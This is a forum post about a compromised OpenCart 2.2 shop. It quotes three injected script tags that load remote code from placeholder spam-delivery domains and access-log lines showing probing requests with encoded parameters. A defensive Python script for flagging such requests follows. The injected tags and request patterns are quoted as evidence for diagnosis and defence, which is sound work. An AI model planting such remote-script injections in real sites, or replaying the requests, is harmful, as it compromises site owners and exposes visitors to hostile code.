Code:
<script data-cfasync='false' type='text/javascript' src='//spam.delivery.domain1.com/blah.php'></script>
<script type="text/javascript" src="//spam.delivery.domain2.com/blah.php"></script>
<script async="async" type="text/javascript" src="//spam.delivery.domain3.com/blah.php"></script>
The filesystem is intact as far as I can tell (I have compared with a clean install). When I stripped out the spam from the database, it was reinjected within hours.
I found the following suspicious requests in the logs (one for each category URL):
Code:
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_155&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5501 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
Is OC 2.2.0.0 vulnerable to SQL injection? I thought db queries were filtered in OC? If so, how did they get in?
Thanks for any advice.
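One way to triage log lines like the three quoted in this post, as an added example (not OpenCart code and not from the poster): parse each Apache combined-log line, pull the `route` out of the query string, and flag any request that carries parameters the route does not read. The stock `product/category` controller only looks at a handful of parameters, so `v`, `at1`..`at4` stand out immediately and the requests can be grouped by source IP. `KNOWN_PARAMS` is an assumption about the OC 2.x catalog controller and should be checked against your own install; the sample input below is the three lines from the post plus one constructed benign request for contrast.

```python
"""Flag OpenCart requests whose query string carries parameters the route does not use.

Added example for this thread, not OpenCart's own code.  KNOWN_PARAMS is an
assumption about the stock OC 2.x product/category controller; adjust it for
your install (and add other routes) before trusting the output.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Assumption: the query parameters the stock OC 2.x product/category controller reads.
KNOWN_PARAMS = {
    "product/category": {"route", "path", "filter", "sort", "order", "page", "limit"},
}

# Apache combined log with a leading virtual-host field, as in the lines quoted above.
# No end anchor, so a trailing field (the repeated client IP) is tolerated.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+)\s+(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"\s+'
    r'(?P<status>\d{3})\s+(?P<size>\S+)\s+"(?P<referer>[^"]*)"\s+"(?P<ua>[^"]*)"'
)

# Sample input: the three requests from the post, plus one constructed benign
# request (203.0.113.9 is a TEST-NET address) that only uses known parameters.
SAMPLE_LOG = [
    'www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61',
    'www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61',
    'www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_155&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5501 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61',
    # constructed benign line
    'www.anonymised.co.uk 203.0.113.9 - - [28/Mar/2017:05:31:02 +0000] "GET /index.php?route=product/category&path=15_74&sort=p.price&order=ASC HTTP/1.1" 200 6110 "-" "Mozilla/5.0 (constructed benign request)"',
]


def parse_line(line):
    """Parse one access-log line; return a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so a parameter sent with an empty value is still counted
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    rec["route"] = rec["query"].get("route", [""])[0]
    return rec


def audit(lines):
    """Return one finding per request that sends parameters its route does not accept."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["route"] not in KNOWN_PARAMS:
            continue
        unexpected = sorted(set(rec["query"]) - KNOWN_PARAMS[rec["route"]])
        if unexpected:
            findings.append({
                "ip": rec["ip"],
                "time": rec["ts"],
                "route": rec["route"],
                "path": rec["query"].get("path", [""])[0],
                "status": int(rec["status"]),
                "unexpected": unexpected,
                "ua": rec["ua"],
            })
    return findings


def summarise(findings):
    """Count flagged requests per source IP so a single scanner stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = audit(SAMPLE_LOG)
    for f in results:
        print(f'{f["time"]} {f["ip"]} {f["route"]} path={f["path"]} '
              f'status={f["status"]} unexpected={",".join(f["unexpected"])}')
    print("flagged requests per IP:", dict(summarise(results)))
```

Run it against a day's access log (`audit(open("access.log"))`) and look at which parameters are unexpected and whether the same IP walks every category: that pattern, combined with identical `at3`/`at4` values across requests, is a script probing each category page, not a shopper. Note that a 200 response does not mean the injection failed; OpenCart still renders the page when it ignores unknown parameters, so the log alone cannot tell you which request did the damage.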